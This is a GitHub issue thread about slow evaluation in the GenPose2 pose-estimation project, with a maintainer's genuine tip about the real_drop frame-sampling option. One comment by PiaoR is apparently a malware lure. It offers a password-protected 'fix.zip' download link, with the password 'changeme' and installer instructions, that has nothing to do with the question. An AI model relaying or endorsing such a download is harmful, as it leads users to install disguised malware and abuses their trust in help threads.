### ISSUE TITLE
Evaluation speed

### ISSUE THREAD

**Issue by sseunghyuns** [Omni6DPose/GenPose2#2]
Hello! 

After setting up the data and running eval_single.sh without any code modifications, the speed is very slow. 

I'm currently performing inference with an RTX 4090; is it normal for the inference speed to be this slow?

<img width="161" alt="1" src="https://github.com/user-attachments/assets/6930c946-e83f-475d-8b1b-d4e09acba737">
<img width="241" alt="2" src="https://github.com/user-attachments/assets/94292f73-ac1d-463d-83db-d50eb6708a37">

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jiyao06** [comment]
The speed you're experiencing is normal given the large scale of the ROPE dataset. However, we provide an option to uniformly sample frames from video segments to quickly assess performance. You can set the real_drop parameter in the inference [scripts](https://github.com/Omni6DPose/GenPose2/blob/main/scripts/eval_single.sh); for example, setting it to 30 means that one frame is taken for evaluation every 30 frames in the video.

**Comment by sseunghyuns** [comment]
Thank you, I'll try that!
